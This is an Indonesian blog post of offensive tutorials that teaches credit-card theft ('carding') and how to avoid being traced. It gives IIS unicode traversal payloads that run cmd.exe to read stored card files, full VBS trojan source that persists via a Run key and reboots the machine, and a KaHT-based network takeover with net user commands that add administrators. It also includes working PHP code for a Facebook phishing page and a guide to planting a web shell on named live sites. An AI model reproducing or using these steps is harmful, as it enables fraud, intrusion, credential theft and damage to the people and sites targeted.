Pages

5 November 2013

Tutorial Carding 2013



pertama kita harus tahu dulu apa itu carder


[1]. Apa itu carder?


——————–


Ketika dunia web pertamakali memperkenalkan keindahannya, mulailah muncul beberapa aksi pengrusakan-pengrusakan kecil yang dilakukan oleh para script kiddies. Tujuan utama tak lain hanyalah demi mendapatkan pengakuan (dari kelompoknya sendiri maupun masyarakat). Seiring dengan maraknya organisasi-organisasi yang menerapkan apikasi bisnis berbasis web, tujuan itu mulai berubah. Bukan lagi pengakuan yang mereka incar, tetapi aksi-aksi itu mulai mengarah pada sesuatu yang selama ini populer di kalangan umat manusia hehehe.. apalagi kalo bukan dengan tujuan kekayaan ($uang$). Professional dalam bidang ini mampu menyusup dalam sistem korban tanpa terdeteksi, keudian mencari file database atau log-log transaksi untuk mendapatkan rincian nomor-nomor kartu kredit. Mereka inilah yang kemudian disebut sebagai CARDER, para perampok cyber.





Pada intinya, untuk melakukan penyalahgunaan kartu kredit, yang diperlukan hanyalah nomor kartu, nama pemilik, dan tangal kadaluwarsanya. Jadi, misi utama seorang carder adalah bagaimana mendapatkan nomor-nomor kartu kredit orang lain, kemudian melakuakn transaksi pembelian dengan nomor kartu kredit itu.


[2]. Yang Harus Anda Sadari


—————————


Sebelum anda memutuskan untuk terjun di dunia carder, ada baiknya anda menyadari dan mengetahui hal-hal berikut:


–[1. Carding adalah sebuah perbuatan dosa yang pelakunya jelas-jeas akan mendapatkan siksa di Neraka. Apapun agama anda (jika anda benar-benar orang beragama), saya rasa tidak satupun dari ajaran agama yang ada memperbolehkan pemeluknya untuk menjadi pencuri.


--[2. Dunia carding bukanlah taman bermain anak-anak yang bisa anda tinggalkan begitu saja setelah anda bermain di dalamnya. Anda bisa, dan sangat mungkin untuk dilacak. Sekali saja anda tertangkap, anda akan menghabiskan sisa umur anda dengan penuh rasa sesal di balik jeruji besi. Nama anda dan keluarga anda akan tercemar, dan satu hal yang perlu anda ingat, tak satupun dari perusahaan yang ada sat ini mau menerima mantan narapidana sebagai karyawan.


--[3. Dalam melakukan aksi carding:


- gunakan line telepon yang bukan milik anda.


- Pakailah account Internet yang juga bukan milik anda.


- Jangan sekali-kali meninggalkan nama asli, handle asli, atau nama orang lain yang mengenal anda.


--[4. Gunakan proxy anonymouse atau elite proxy. Manfaatkan anonymizer, namun perlu anda ketahuai bahwa biasanya anonymizer menolak untuk melayani protokol http over ssl (https://). Ingat selalu bahwa setiap transaksi di Internet pasti mencatat alamat IP anda.


--[5. Bersihka jejak yang tertinggal di komputer tempat anda melakukan aksi menggunakan penghapus jejak yang telah banyak beredar di Inet. Dan jika anda cukup paranoid, hapus sidik jari!!


[3]. Kemampuan dasar


——————–


Jika anda benar-benar ingin menjadi professional carder, setidaknya ada beberapa kemampuan dasar yang harus anda kuasai:


–[3.1 Pelajari web programming


Ini merupakan hal yang paling mendasar. Anda akan banyak sekali membutuhkan kemampuan ini nantinya. mJika anda belum pernah mengenal bahasa pemrograman web apapun, anda bisa memulai dengan belajar HTML. Sebagai upaya latihan, anda bisa memulai dengan membuat home page sederhana. Tentu saja anda harus memuai segalanya dari nol, dalam artian jangan menggunakan HTML generator. Belajarlah menulis kodenya sendiri!


Setelah itu anda dapat mencoba bahasa-bahasa web lain yang sedikit lebih rumit. Daftar bahasa-bahasa pemrograman web beserta gambaran singkatnya bisa anda baca pada tulisan saya yang berjudul “Mengenal Bahasa-Bahasa Pemrogramana Web” di http://www.spyrozone.net. Pelajari dan pahami cara kerja bahasa-bahasa itu, bagaimana sifat-sifatnya, cari letak kelemahannya serta apa saja resiko-resiko keamanan yang potensial dari bahasa-bahasa itu.


--[3.2 Mengenal teknologi web server dan database server


Web server dan database server merupakan komponen utama dari suatu aplikasi Internet yang tangguh. Untuk satu alasan ini, dan juga banayka alasan-alasan lainnya, menyebabkan begitu banyak attacker menjadikannya sebagai sasaran empuk. Dengan memahami teknologi-teknologi web server seorang carder akan mampu meneliti dan mencari celah-celah keamanan di baliknya. Setelah celah keamanan itu ditemukan, barulah sang carder menerobos system dengan memanfaatkan celah tadi untuk kemudian mencari file database yang berisi rincian data kartu kredit pelanggan.


Database adalah sebuah mekanisme penyimpanan dan pencarian data bagi para pelanggan, istilah pelanggan disini bisa juga diasumsikan sebagai carder ^_^. Ironisnya, kerentanan database ternyata tidak terlalu diperhatikan oleh sebagian webmaster.


Pelajari perintah-perintah SQL, ketahui database-database default pada suatu sistem server SQL dan beberapa fungsi-fungsi yang ada padanya. Ketahui juga bagaimana bentuk setting default pada database itu, biasanya (dan seringkali) terdapat banyak sekali celah keamanan pada konfigurasi default database dan web server.


--[3.3 Memahami seluk beluk URL


URL merupakan sebuah celah yang sangat sempit dan sangat halus, sebuah mekanisme untuk mengenali sumber-sumber pada web, SSL, server FTP dan masih banyak lagi. Pelajari seluk-beluk URL, anda akan memiliki kemampuan untuk melakukan identifikasi teknologi, memahami apa yang ada dibaliknya. Hal ini akan sangat membantu anda. Pada kenyataannya, dewasa ini banyak serangan-serangan mematikan yang terjadi dan pencurian-pencurian file database dilakukan hanya dengan berbekal browser. Semua itu bisa dilakukan dikarenakan kemampuan yang baik dalam menganalisis struktur URL yang didasari oleh pengetahuan yang cukup mengenai seluk-beluk URL


--[3.4 Mengikuti perkembangan teknologi Troli Belanja


Teknologi yang mendukung komponen troli belanja adalah session managemen, statetracking dan antarmuka navigasi Front-End. Pemrogramannya sendiri dilakukan dengan menggunakan bahasa script seperti PHP, PERL, ASP, dan bahkan terkadang juga menggunakan komponen-komponen yang sudah ada, misalnya saja class Java.


Pelajari dan ikuti perkembangan teknologi troli belanja. Ada begitu banyak troli belanja yang kurang baik penerapannya dan memungkinkan untuk digunakan sebagai alat eksekusi jarak jauh melalui HTTP. Beberapa tehnik exploitasinya sudah pernah saya posting di http://www.spyrozone.net , silahkan anda baca-baca arsip lama.


[4]. Apa yang harus dilakukan setelah mendapat kartunya?


———————————————————


Sudah mendapat kartu yang valid bukan berarti semuanya telah sukses. Untuk bisa mendapatkan barang di tangan anda, paling tidak anda sudah harus familiar dengan kata-kata berikut: Fraud buyer, Fraud seller, tctred, zip, black list country, payPal , Yahoo! Auction, Ebay dsb… Kemampuan yang baik dalam berbahasa Inggris juga sangat dibutuhkan


Jika itu semua sudah anda pahami, maka kini saatnya untuk berbelanja Di Indonesia mungkin agak sedikit sulit digunakan karena kebanyakan bisnis komersil yang ada akan memeriksa secara detail data-data nomor kartu kredit tersebut. Jika anda punya rekan di luar negeri, hal itu akan sangat membantu karena prosedur disana pada umumnya tidak serumit di Indonesia.


Beberapa hal yang populer dilakukan oleh para ABG adalah dengan menggunakan nomor-nomor itu untuk melakukan registrasi member situs-situs porno. *_^ Ada pula yang memakai cc curian untuk membeli domain situs pribadi.


Perlu anda ketahui bahwa cc curian biasanya tidak akan bertahan lama. Jarang sekali ada CC curian yang “panjang umur” . Adakalanya hanya berumur satu hari, kurang dari 12 jam, bahkan tak jarang sesaat setelah anda meg-order barang perusahaan terkait akan merasakan adanya kejanggalan-kejanggalan. Atau mungkin sang pemilik akan menemukan ketidakberesan dalam laporan rekening kartu kreditnya.


Apapun yang akan anda lakukan dengan nomor cc itu, elalu hati-hatilah dalam menjaga identitas. Jangan pernah memiliki anggapan bahwa anda tidak akan dilacak atau tertangkap. Kemungkinan itu selalu ada. Kurangi frekuensi transaksi ilegal yang anda lakukan karea hal itu juga berpengaruh dalam memperpendek kartu kredit (curian) anda.


[5]. Adakah cara mudah menjadi carder?


————————————-


Jawaban dari pertanyaan itu adalah.. “ADA!” namun anda akan kehilangan kesan profesional dan hasil yang anda dapat juga kurang (bahkan tidak) memuaskan. Di kota-kota besar dimana penggunaan kartu kredit sedemikian meluas, anda bisa dengan mudah mendapatkan nomor CC dengan mengaduk-aduk tempat sampah toko grosir atau pasar swalayan besar untuk mendapat bon kartu kredit pelanggan. Pekerjaan sebagai penjaga kasir di swalayan-swalayan besar (jika anda perempuan) juga potensial untuk mendapatkan CC pembeli. Sempatkan saja untuk menyalin nomor-nomor itu secara sembunyi-sembunyi.


Bagaimana dengan CC generator? Pada umumnya jika anda menggunakan CC generator maka anda akan gagal melakukan transaksi. Pada kenyataannya, nomor-nomor CC yang dhasilkan itu hanyalah nomor-nomor fiktif. Saat ini hampir-hampir tidak bisa ditemui lagi toko elektronis yang melakukan pengecekan berdasarkan algoritma keempatbelas digit kartu kredit saja.


Pada umumnya mereka akan melakukan pemeriksaan berdasarkan:


- Nama pemegang kartu


- Nomor kartunya


- Kode pos dari alamat pemegang kartu


Jadi, sebaiknya anda tidak usah terlalu percaya dengan CC generator yang banyak beredar di Internet. Banyak CC generator yang ada hanya ditujukan untuk menipu para script kiddies.


—// Penutup


Hanya inilah panduan singkat yang bisa saya berikan kepada anda. Hati-hatilah selalu jika anda berniat menjadi carder. Berfikirlah sebelum bertindak sebelum anda menyesal nantinya. Mungkin dibalik jeruji besi itulah nanti anda akan menyadari bahwa ternyata anda tidak secerdas yang anda kira… ^_^


Nah Sekarang ke topik Pembahasannya:


TUTORIAL KE 1


1. Cari target dahulu Website Cart32 min v3.5a di google.com, dengan keyword allinurl:/cart32.exe/
2. Ambil salah satu site hasil pencarian, misalnya :


http://www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound


3. Ganti url tsb diakhir stringnya menjadi http://www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/error <– setelah string /cart32.exe/ ditambah kata error
4. Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
5. Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
6. Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc’s!
7. Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya….
8. Ganti string url tsb. menjadi seperti ini : http://www.wideopen.net/wrburns_s/cgi-bin/cart32/ <– dimana string .exe dihapus/dihilangkan!
9. Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan formathttp://www.contoh.com/cart32/<file.c32&gt;
10. Contoh http://www.wideopen.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
Ok, semoga berhasil, materi ke-1 Selesai.


TUTORIAL Ke 2

1. Sama seperti tutorial pertama, Cari target dahulu di google.com dgn keyword allinurl:/cart32.exe/
2. Misalkan kita mendapat target dg url:

http://www.contoh.com/scripts/cart32.exe/blablabla , maka:




3. Ganti url tsb menjadi -> http://www.contoh.com/scripts/
4. Modifikasi url tsb dg memasukkan unicode dibelakangnya -> http://www.contoh.com/scripts/<unicode&gt;
5. Contoh unicode utk path /scripts/ : –>
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
Sedangkan utk path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
6. Sebagai contoh, pada url diatas menggunakan path /scripts/ maka diubah menjadi http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
7. string diakhir unicode dg keterangan dir+c:\ maksudnya kita sedang berada dan melist directory c server target!
8. Untuk masuk ke directory cc’s ganti perintahnya unicode dgn ->http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
9. Kita akan output list dari file .32 sebagai contoh namanya WRBURNS-001065.c32
10. Nah.., utk melihat filenya dg unicode http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
11. Kalo tidak berhasil, kita masih bisa mencobanya dengan unicode yg laennya.
12. Ok, semoga berhasil, materi ke-2 Selesai.

" Membuat Virus Perusak Data Dari Notepad Jenis Trojan "

Bagi Teman-teman yang ingin belajar membuat virus, saya akan memberikan sebuah script untuk membuat virus sederhana dari notepad berjenis trojan, virus ini pun mampu merusak data-data yang terdapat di komputer/laptop kita, oleh karnanya apabila akan mencobanya harus berhati hati dalam pengoprasiannya, caranya apabila virus ini akan di tanamkan/dijalankan silahkan save script yang di tulis di notepad dengan ekstensi .vbs dan apabila tidak akan ditanamkan atau dijalankan simpan saja dengan ekstensi .txt 
Contoh : 
(VirusMaho.vbs) dengan file ekstensi tersebut maka virus akan aktif dan apabila di save dengan ekstensi (VirusMaho.txt) maka virus ini tidak akan berjalan dan akan tersimpan berupa text / notepad.

Berikut adalah script untuk membuat virusnya :
rem - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData

set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)

createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"

sub createRegKey(regKey,regVal)
set regEdit = CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub

set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
generateCopy.close

set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")

set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem()

function setFile()
fileData="rem - ^dlRB^ by D.L." &vbcrlf& _
"strComputer = ^.^ " &vbcrlf& _
"Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)" &vbcrlf& _
"Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
"(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
"For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
"ObjOperatingSystem.Reboot()" &vbcrlf& _
"Next"
end function

function rebootSystem()
strComputer = "."

Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function

semoga bermanfaat,,....

HACKED lewat DOS (Windows XP / 2000)

Sebenernya dah dulu ni sih mngkn temen dah ada yang tau dua program ini tp tak apalah sapa tau da yang minat he he ok langsung aja......... Arrow 
kita harus punye 2 program yaitu:
1. internet Maniac (Internet Maniac.exe) ... Download Interenet Maniac : [i][url=. Download Interenet Maniac]. Download Interenet Maniac[/url]
Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname

2. KaHT (KaHt.exe) ... Download program hacker KaHT :[url=Download program hacker KaHT]Download program hacker KaHT[/url]
Berfungsi sebagai program untuk menerobos ke computer server atau client
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe 
Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. 
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pakek WINZIP atau pakek apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. 

Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. 
Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Smile
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja)

Setelah kamu dapetin sasaran computer yang mau di masukin / diremote maka kamu langsung aja kamu jalankan program Internet Maniac

Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. 
Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. 
Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt 
Setelah berhasil masuk DOS maka masuklah di directory program KaHN, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaH) maka ketikkan “CD\KaHT” dan seterusnya. 
Jika sudah, ini saatnya… 

Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : "KaHT Ip1 ip2"
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan

Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho.
Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1” lalu enter aja
Nah disini nanti program akan bekerja otomatis.
Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\windows\system" milik komputer tujuan / sasaran setelah pen-scan-an selesai.
Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe 
Nah kalo udah begini kita bisa berkreasi : 
Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. 
Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. 
Diatas cuman kreasi dikit aja, kamu bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas
Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..

*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member) 
________________________________________
Membuat akses administrator Windows untuk kita lewat komputer lain 
Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik.

Melihat akses guest dan administrator di Windows
Ketik : net user
Melihat aktif tidaknya guest di Windows
Ketik : net user guest 
Membuat akses guest menjadi Administrator dengan perintah :
Ketik : net localgroup Administrators Guest /add
Membuat akses adminstrator sendiri :
1. Ketik : net user /add
2. Ketik : net localgroup Administrators /add 
Menghapus akses administrator
Ketik : net localgroup Users /delete

semoga ber manfaat Very Happy 

Cara Hack Facebook dengan Phising 2013

Bukanlah suatu hal yang sulit untuk kita lakukan.terlebih jika anda sedikit aja mengenal bahasa HTML.terasa akan bertambah mudah untuk kita buat tentang cara hack facebook yang satu ini.memang ada yang bilang sudah jadul tapi saya pribadi berpedapat sebaliknya.phising adalah tehnik hack facebook yang simpel,rapi,tidak memerlukan tehnik yang khusus untuk membuatnya dan sangatlah cocok untuk pemula.memanfaatkan kelengahan dan juga memancing pengguna untuk login ke halaman palsu merupakan ciri khas dari hack phising.karena facebook memiliki pengguna yang banyak maka saya jadikan sebagai contoh cara membuat Phising facebook
 
1.Membuat Halaman Home Page Facebook Palsu.
Silahkan kunjungi www.facebook.com atau kamu bisa mengetik alamat URL tersebut di tab baru browser computer sobat.tunggu sampai loading selesai.lalu tekan CTRL dan U secara bersamaan hingga muncul kode script halaman dari facebook.Simpan semua code tersebut ke notepad.dengan file name :index.html Save As Type : all files 


Setelah tersimpan di notepad sobat tekan CTRL dan F Untuk mempermudah pencariaan code : action="https://www.facebook.com/login.php?login_attempt=1" method="post" 
Jika sudah ketemu hapus code tersebut ganti dengan action="login.php" method="post" dan save kembali dengan cara seperti di atas. 

Sampai di sini kita telah punya sebuah File index.html dengan action login.php 
2. Membuat File Script PHP (login.php) 
Script ini yang nantinya kita fungsikan untuk mengambil data input dari form login yang di masukan oleh user atau target.dan file ini harus terhubung dengan action yang ada di file index.html.karena itu kita wajib dan tax bisa di tawar lagi untuk menamai file ini dengan login.php 
Save as file php di bawah ini dengan file name login.php dengan Save as type all files pada notepad sobat.
<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"http://texass1m.16mb.com/confirmasi-texas-holdem-poker.html\";
// -->
</script>";
?>

3. Membuat file logs.txt 
File ini nantinya berfungsi menyimpan data dari login.php dalam bentuk text. 
Cara membuatnya ketik aja logs txt pada notepad sobat terus nama file tersebut atau file name logs.txt dan Save as type all files pada notepad sobat. 
Sampai di sini kita telah selesai membuat file untuk phising facebook dan kita jadi punya 3 buah file yaitu : 
• index.html
• login.php
• logs.txt 
Supaya ke tiga file tersebut bekerja dengan sempurna maka anda harus punya hosting yang Suport PHP untuk upluad file tersebut.saya merekomendasikan untuk yang gratis aja dulu seperti Indhostinger silahkan baca di sini untuk cara mendaftar di indhostinger dan 000webhost silahkan baca di sini untuk Cara Daftar Webhosting di 00Webhost Free 
Demikianlah Cara Hack Facebook dengan Phising Semoga ada manfaatnya.jika ada yang kurang jelas silahkan bertanya di kolom komentar siapa tahu saya bisa membantu.

Teknik Deface Website Dengan Bypass Admin


Nah...
Maaf Sebelumnya...
Ini Postingan untuk yg belum tau aja...
Teknik Deface Website Dengan Bypass Admin Login ...

Saya Ambil dari Blog Indonesian Cyber Army : http://indocyberarmy.blogspot.com/

Langsung aja ya...

Quote:

"
Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"


Dork: inurl:/index_info.php

*Bisa Dikembangkan Sendiri...


Live Target : http://niche-marketplace.net/index_info.php

Recommended by M1nD-Fr34Kz :
Code:
http://www.thegreenway.co/
http://thepawzpetservices.ca/
http://www.bomiscoelectronics.com/



Langkah Langkahnya:

Cari Target di mbah Google dengan Dork yg sudah tersedia..

Saya Ambil Contoh : http://niche-marketplace.net/index_info.php

Klik:

Enlarge this image


Lalu masuk ke halaman login admin!
biasanya letaknya site.com/admin/index.php atau
site.com/[path]/admin/index.php

contoh : http://niche-marketplace.net/admin/index.php

klik:

Enlarge this image


Setelah itu kita lakukan Inspect Elemen! dengan cara klik kanan, lalu pilih Inspect Element!

Klik:

Enlarge this image


Lalu akan muncul seperti gambar dibawah! yang perlu kita lakukan adalah mencari Source code berikut :

Klik:

Enlarge this image



Ganti "hidden" dengan "text" lalu akan muncul kotak label "admin_settings_read" ganti read menjadi write! lihat gambar!

Klik:

Enlarge this image


Lalu tekan Enter!

Klik:

Enlarge this image


Klik Login!


Kalo ada muncul pesan seperti digambar , berarti target vuln ato bisa di depes!
Selain itu ga bisa, cari target lain! :p


Klik:

Enlarge this image


Gambar Diatas Menunjukkan kalo kita Sudah Masuk Control Panelnya..

Nahh...
Saatnya Menanam Shell.. Very Happy


WAJIB!!! Harap diperhatikan dan dicermati baik baik, jika ada sedikit kesalahan maka Shell sobat yg ditanem akan Gagal dieksekusi! dan akhirnya balik lagi ke awal :p


Pertama gulirkan kebawah! cari menu "Add/Remove Navigation Page"

Klik:

Enlarge this image


Klik Add/Remove Navigation Page! Lalu ketik nama shell.php sobat, kalo aku kasih nama "idca.php". Untuk lebih jelasnya liat gambar!

Klik:

Enlarge this image
Cool.jpg" border="0" alt="" />


Lalu klik "Add New Navigation"

Klik:

Enlarge this image


Setelah itu masih dihalaman yg sama, liat kebawah sampai menemukan kalimat: "Sort Page Buttons/links" trus ubah "idca.php.html" jadi "/idca.php". liat gambar!

Klik:

Enlarge this image


Lalu klik "Sort Navigation Pages"!

Selanjutnya cari Menu "Edit Navigation Pages" lalu klik menu tersebut. Kemudian pada kolom "Please Select a Pages To Edit" lalu pilih "idca.php.html". disini kita akan melakukan Inspect Element lagi, lalu cari kata "idca.php.html" dan ubah jadi "idca.php". Lihat gambar!

Klik:

Enlarge this image


Kemudian masih dihalaman yg sama, gulirkan kebawah!

Pada kolom "Enter A Page Title As You Would Like To Be Seen" ketik "idca.php"

Pada kolom "URL For This Site" ketik "main_pages/idca.php"

Pada kota box, ceklis/centang ketiganya. untuk lebih jelas, lihat gambar!

Klik:

Enlarge this image


Selanjutnya masih juga di halaman yg sama, gulirkan kebawah! Pada kolom "Enter Content for Your Pages" pilih "Source" lalu editor akan aktif!

Buka shell Backdoor (madspotshell.php) dengan notepad untuk dipaste kan ke Konten Pages!

Klik:

Enlarge this image



WAJIB DIPERHATIKAN, karena menentukan keberhasilan!

Sebaiknya Shell Backdoor jangan diberi password!


Jadi nanti seperti ini cara nulisnya.



{ Isi Kodingan PHP Shell dari awal sampai akhir }



Yap di Line awal diisikan ruang kosong 2x (alias teken enter 3x) dan di Line akhir diisikan ruang kosong 2x (alias teken enter 3x). Kurang jelas? lihat gambar :

Klik:

Enlarge this image


lalu Klik Save Edited Navigation Page

Klik:

Enlarge this image



Akan muncul pesan seperti gambar berikut!


Klik:

Enlarge this image



Selanjutnya saatnya kita buka shell backdoor yg udah kita tanem! caranya tulis diadress bar: http://site.com/main_pages/Nama File Backdoor.php Liat gambar!

Klik:

Enlarge this image


Huft! Akhirnya Selesai dan Berhasil tuh! Tinggal tebas index aja! wkwkwk


Sekian...
Semoga Bermanfaat..

RAHASIA TEKNIK JEBOL PASSWORDS


Semua pasti setuju bahwa “Password” PASTI BERHUBUNGAN DENGAN
SEGALA SESUATU YANG SIFATNYA SANGAT RAHASIA, PENTING,
PRIBADI dan Segala Hal yang sifatnya SANGAT BERHARGA.
Password merupakan serangkaian karakter, baik berupa huruf, string, angka dan
Kombinasi dari beberapa hal tersebut untuk melindungi dokumen penting / sesuatu
yang berharga untuk memastikan seseorang yang mengakses sistem tersebut adalah
PEMILIK YANG SEBENARNYA.
Password bersifat SANGAT RAHASIA dan TERTUTUP UNTUK ORANG LAIN,
sehingga fatal akibatnya jika informasi yang kita miliki diketahui oleh orang lain.
Bayangkan Jika Password Email Anda Jebol ?
Maka seluruh data-data anda pada email anda tersebut akan dapat diketahui, padahal
email adalah salah satu hal yang bersifat pribadi.
Itu contoh yang termudah, bagaimana jika Password Account Internet Banking anda
yang Jebol ?
Wah, bisa-bisa seluruh uang anda di Account tersebut bisa dikuras habis oleh sang
Maling ..... !!!!! Bahaya sekali, Bukan ?
Pada bagian ini, saya TIDAK BERTUJUAN Untuk MENDIDIK Anda Untuk
Menjadi Maling / Penjahat, tetapi Ingin Membuka Wawasan Kepada Anda :
BAHWA JANGAN PERNAH MERASA AMAN
walaupun anda sudah MEMPROTEKSI MILIK ANDA YANG BERHARGA
dengan PASSWORD !!!
Sebab Bagaimanapun sistem PASSWORD dibuat oleh MANUSIA, dan dapat dijebol
pula oleh MANUSIA ... !!!
Baiklah , mari kita pelajari satu persatu ...
Tools / Alat untuk Menjebol Password.
Cara Termudah Menjebol Password adalah dengan menggunakan “ Tools/Alat “.

Tips Membuat Password yang 99,9 % Aman
